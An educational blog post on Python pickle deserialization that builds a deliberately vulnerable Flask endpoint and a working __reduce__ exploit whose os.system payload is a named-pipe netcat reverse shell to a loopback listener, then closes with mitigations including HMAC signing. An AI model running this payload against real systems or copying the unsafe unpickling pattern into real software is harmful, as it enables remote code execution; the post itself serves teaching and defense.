Exploiting Python pickles


In a recent challenge I needed to get access to a system by exploiting the way Python deserializes data using the pickle module. In this article I want to give a quick introduction to pickling and unpickling data, highlight the issues that can arise when your program deals with data from untrusted sources, and “dump” my own notes.

For running the example code I’m using Python 3.8.2 on macOS 10.15; the demonstration of the reverse shell is just a connect-back to a loopback address.

TL;DR: Never unpickle data from sources you don’t trust. Otherwise you open your app up to a relatively simple way of remote code execution.

What is pickle?

In Python, the pickle module lets you serialize and deserialize data. Essentially, this means that you can convert a Python object into a stream of bytes and then reconstruct it (including the object’s internal structure) later in a different process or environment by loading that stream of bytes.

When consulting the Python docs for pickle one cannot miss the following warning:

Warning: The pickle module is not secure. Only unpickle data you trust.

Let’s find out why that is and how unpickling untrusted data could ruin your day.

How to dump and load?

In Python you can serialize objects by using pickle.dumps():

import pickle
pickle.dumps(['pickle', 'me', 1, 2, 3])

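The pickled representation we get back from dumps looks like this (protocol 4, the default in Python 3.8):

b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.'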

And now reading the serialized data back in…

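import pickle
pickle.loads(b'\x80\x04\x95\x19\x00\x00\x00\x00\x00\x00\x00]\x94(\x8c\x06pickle\x94\x8c\x02me\x94K\x01K\x02K\x03e.')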

…will give us our list object back:

['pickle', 'me', 1, 2, 3]
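
To illustrate what "including the object's internal structure" means, here is a small round-trip sketch. The names inner and outer are made up for this example. It checks that the restored object is an equal but separate copy, and that a list referenced twice is still one shared list after loading.

```python
import pickle

# 'inner' is referenced twice from 'outer' (hypothetical example data)
inner = ['shared']
outer = {'a': inner, 'b': inner, 'n': (1, 2.5, None)}

restored = pickle.loads(pickle.dumps(outer))

same_value = restored == outer                     # equal content
is_copy = restored is not outer                    # but a new object
still_shared = restored['a'] is restored['b']      # sharing is preserved
print(same_value, is_copy, still_shared)
```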

What actually happens behind the scenes is that the byte stream created by dumps contains opcodes, which are executed one by one as soon as we load the pickle back in. If you are curious what the instructions in this pickle look like, you can use pickletools to create a disassembly:

>>> pickled = pickle.dumps(['pickle', 'me', 1, 2, 3])
>>> import pickletools
>>> pickletools.dis(pickled)
    0: \x80 PROTO      4
    2: \x95 FRAME      25
   11: ]    EMPTY_LIST
   12: \x94 MEMOIZE    (as 0)
   13: (    MARK
   14: \x8c     SHORT_BINUNICODE 'pickle'
   22: \x94     MEMOIZE    (as 1)
   23: \x8c     SHORT_BINUNICODE 'me'
   27: \x94     MEMOIZE    (as 2)
   28: K        BININT1    1
   30: K        BININT1    2
   32: K        BININT1    3
   34: e        APPENDS    (MARK at 13)
   35: .    STOP
highest protocol among opcodes = 4
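
If you would rather inspect the opcodes programmatically than read the printed listing, pickletools.genops should do the job. The following is only a sketch: I pin protocol=4 so the opcode sequence matches the disassembly above regardless of the interpreter's default, and the variable name opcode_names is my own.

```python
import pickle
import pickletools

# Pin the protocol so the result does not depend on the Python version
pickled = pickle.dumps(['pickle', 'me', 1, 2, 3], protocol=4)

# genops yields (opcode, argument, position) tuples; it only parses
# the byte stream and does not execute anything
opcode_names = [opcode.name for opcode, arg, pos in pickletools.genops(pickled)]
print(opcode_names)
```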

Controlling the behavior of pickling/unpickling

Not every object can be serialized (e.g. file handles), and pickling and unpickling certain objects (like functions or classes) comes with restrictions. The Python docs give you a good overview of what can and cannot be pickled.
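
A quick way to get a feeling for these restrictions is to simply try. The helper can_pickle below is a hypothetical name of mine, not part of the pickle module. It treats the exception types I would expect pickle.dumps to raise for unpicklable objects as "no".

```python
import os
import pickle

def can_pickle(obj):
    """Return True if pickle.dumps accepts obj, False otherwise."""
    try:
        pickle.dumps(obj)
        return True
    except (pickle.PicklingError, TypeError, AttributeError):
        return False

# os.devnull is used only to get hold of an open file handle
with open(os.devnull) as handle:
    results = {
        'list': can_pickle(['pickle', 'me']),
        'file handle': can_pickle(handle),
        'lambda': can_pickle(lambda x: x),
    }
print(results)
```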

While in most cases you don’t need to do anything special to make an object “picklable”, pickle still allows you to define a custom behavior for the pickling process for your class instances.

Reading a bit further down in the docs, we find the __reduce__ method, which from an attacker’s perspective is exactly what we need to get code execution:

The __reduce__() method takes no argument and shall return either a string or preferably a tuple (the returned object is often referred to as the “reduce value”). […] When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or None can be provided as their value. The semantics of each item are in order:

  • A callable object that will be called to create the initial version of the object.
  • A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. […]

So by implementing __reduce__ in a class whose instances we are going to pickle, we can hand the unpickling process a callable plus some arguments to run. While this is intended for reconstructing objects, we can abuse it to get our own reverse shell code executed.
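
Before turning this into an exploit, here is a harmless sketch of the mechanism. The class name Demo is made up, and I picked the builtin sorted as the callable purely because it is safe. Note that what comes back from loads is whatever the callable returns, not an instance of the class.

```python
import pickle

class Demo:
    def __reduce__(self):
        # (callable, args): on load, the unpickler calls sorted([3, 1, 2])
        return sorted, ([3, 1, 2],)

restored = pickle.loads(pickle.dumps(Demo()))
print(type(restored), restored)
```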

Creating a vulnerable app

Now that we have a basic idea of how to create dangerous data to unpickle, let’s build a vulnerable app for demonstration purposes.

We’ll use the web framework Flask to create a small web application with one route.

Let’s install Flask in a new virtual environment:

# setup virtualenv
virtualenv venv --python=/your/path/to/python

# activate
source venv/bin/activate

# install Flask
pip install Flask

And now create app.py:

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/hackme", methods=["POST"])
def hackme():
    data = base64.urlsafe_b64decode(request.form['pickled'])
    deserialized = pickle.loads(data)
    # do something with deserialized or just
    # get pwned.

    return '', 204

At /hackme we implement a POST route that reads the form field pickled. The data arrives base64-encoded (for transfer), is decoded, and is then unpickled.

Let’s run the app with flask run and then prepare our malicious pickled data to send.

Creating the exploit

As described above we want to create a class that implements __reduce__ and then serialize an instance of that class.

We’ll call our class RCE and let its __reduce__ method return a tuple of a callable and a tuple of arguments (as per the mentioned docs).

import pickle
import base64
import os

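class RCE:
    def __reduce__(self):
        # Reverse shell over a named pipe, connecting back to the
        # listener on the loopback address (port 1234)
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
               '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f')
        # (callable, args): the unpickler will call os.system(cmd)
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    # Print the payload base64-encoded, ready to be sent as form data
    print(base64.urlsafe_b64encode(pickled).decode())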

Our callable will be os.system and the argument a common reverse shell snippet using a named pipe, that will run on our macOS demo machine.

Now let’s run the exploit script to create a base64 encoded pickle byte stream:

$ python exploit.py

If you run pickletools.dis again, you will see the system callable plus arguments and the REDUCE opcode (R).
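
Here is a sketch of that disassembly step with a harmless command swapped in for the reverse shell. The class name Harmless and the echo command are mine. Nothing is executed here: the object is only dumped and disassembled, never loaded. The module name shown next to system depends on the platform.

```python
import io
import os
import pickle
import pickletools

class Harmless:
    def __reduce__(self):
        # Same shape as the exploit, but with a benign command
        return os.system, ('echo hello from pickle',)

payload = pickle.dumps(Harmless(), protocol=4)

# dis only parses the byte stream; it never calls os.system
buffer = io.StringIO()
pickletools.dis(payload, out=buffer)
listing = buffer.getvalue()
print(listing)
```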

Sending the payload

Finally, we can start a netcat listener and send the payload to our listening Flask application:

# netcat listener for reverse shell in separate window/pane
nc -nvl 1234

# Send request
# (assumes the default address of flask run)
curl -d "pickled=gASVbgAAAAAAAACMBX..." http://127.0.0.1:5000/hackme

After sending the HTTP request to /hackme, our code will execute and give us a shell back.
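
If you prefer to stay in Python for this step, the request can be sketched with the standard library as well. The function name build_request is hypothetical, the URL assumes the default address of flask run, and the pickle used here is just a plain list rather than the exploit. The sketch only builds the request. Sending it is left as a commented-out line.

```python
import base64
import pickle
import urllib.parse
import urllib.request

def build_request(url, pickled_bytes):
    """Build (but do not send) a form-encoded POST carrying a pickle."""
    encoded = base64.urlsafe_b64encode(pickled_bytes).decode('ascii')
    body = urllib.parse.urlencode({'pickled': encoded}).encode('ascii')
    return urllib.request.Request(url, data=body, method='POST')

# Assumed address: Flask's development server default plus the /hackme route
request = build_request('http://127.0.0.1:5000/hackme',
                        pickle.dumps(['pickle', 'me', 1, 2, 3]))

# To actually send it against a running app:
# urllib.request.urlopen(request)
```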

Lesson from this demonstration: don’t unpickle untrusted data. It doesn’t matter if you receive this pickled data from anonymous users over the network or if it’s passed to you to restore a session or program state.

If you need to work with untrusted data, the right mitigation depends on your use case. As the docs suggest, consider signing the data if it could have been modified in transit or on disk, or choose a different, safer serialization format altogether (like JSON). When storing pickles on the filesystem, it is also worth checking the file permissions to prevent privilege escalation through modification of those pickles.
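
As a rough idea of what signing could look like, here is a minimal sketch using hmac from the standard library. The names SECRET_KEY, sign and verify_and_load are my own, and the key shown is a placeholder. This only helps if the key stays secret and the data was pickled by you in the first place, since anyone who holds the key can still produce a malicious pickle.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b'replace-with-a-real-secret'  # placeholder, assumption
DIGEST_SIZE = hashlib.sha256().digest_size

def sign(data, key=SECRET_KEY):
    """Prefix the pickled bytes with an HMAC-SHA256 tag."""
    tag = hmac.new(key, data, hashlib.sha256).digest()
    return tag + data

def verify_and_load(blob, key=SECRET_KEY):
    """Unpickle only if the tag matches; raise ValueError otherwise."""
    tag, data = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, data, hashlib.sha256).digest()
    # compare_digest avoids leaking information through timing
    if not hmac.compare_digest(tag, expected):
        raise ValueError('signature mismatch, refusing to unpickle')
    return pickle.loads(data)

blob = sign(pickle.dumps(['pickle', 'me', 1, 2, 3]))
print(verify_and_load(blob))
```

Flipping a single bit in blob before calling verify_and_load should raise ValueError instead of reaching pickle.loads.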

To learn more, I recommend watching the BlackHat 2011 talk “Sour Pickles, A serialised exploitation guide in one part” by Marco Slaviero. He describes in detail the (un)pickling process, the pickle virtual machine parts, and how to craft more general shellcodes using a custom toolset.
